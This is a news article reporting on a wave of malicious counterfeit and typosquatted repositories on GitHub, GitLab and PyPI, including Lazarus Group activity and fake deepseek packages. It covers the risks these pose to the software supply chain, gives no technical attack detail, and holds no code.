Long regarded as cornerstones of the open-source software world, GitHub and GitLab are now the focus of a wave of sophisticated attacks. Researchers warn that cybercriminals are planting counterfeit repositories disguised as legitimate projects. Behind the façade, these repos hide dangerous payloads that, when downloaded, deploy spyware and remote access Trojans—giving attackers unrestricted entry to victims’ devices. 

In the first six months of 2025, 63% of recorded cyberattacks relied on malware, according to Positive Technologies. The firm also found that distribution via websites nearly doubled compared to 2024. Analysts warn this marks a strategic change, as cybercriminals now aim to compromise developers themselves—placing the integrity of core software code at risk.  

Unmasking How Fraudulent Projects Deceive and Exploit Users 

It’s a subtle but effective approach. Cybercriminals mimic popular open-source repositories, then leverage typosquatting by creating packages with nearly identical names. Developers who mistype a command end up downloading the attacker’s malicious code instead of the real software. 

Attackers in Russia, Brazil, and Turkey have already used these methods against cryptocurrency users and investors, deploying malware that steals wallet addresses, banking details, and personal data. Meanwhile, in the U.S., Europe, and Asia, the North Korean Lazarus Group compromised at least 233 victims by planting a malicious JavaScript program in developer environments to covertly collect system information. 

Cyberattacks Put Global Supply Chains at Risk  

According to researchers, the danger reaches far past single victims. By inserting malicious code into widely used developer resources, attackers risk triggering chain reactions across the software ecosystem. One corrupted project could put thousands of organizations in jeopardy simultaneously. 

Evidence of the threat is clear. Earlier this year, attackers planted deepseek and deepseekai in the PyPI repository to infiltrate the work of machine learning specialists. Once installed, the malware exfiltrated environment variables and sensitive information, turning development environments into surveillance platforms. 

The Rising Global Danger 

What’s happening across GitHub, GitLab, and other open-source platforms illustrates a major shift in cyberwarfare tactics. Rather than relying solely on phishing or ransomware, adversaries are targeting the very foundations of how software is built. 

For both IT firms and governments, the danger is twofold: compromised developer tools could open doors to critical infrastructure and simultaneously weaken trust in open-source collaboration — a cornerstone of modern innovation. Researchers warn these attacks will persist as long as platforms stay open, decentralized, and globally available. The challenge is no longer just technical but cultural: protecting the openness of coding communities while strengthening defenses. For developers worldwide — the gatekeepers of the digital era — the battleground has now moved into their repositories.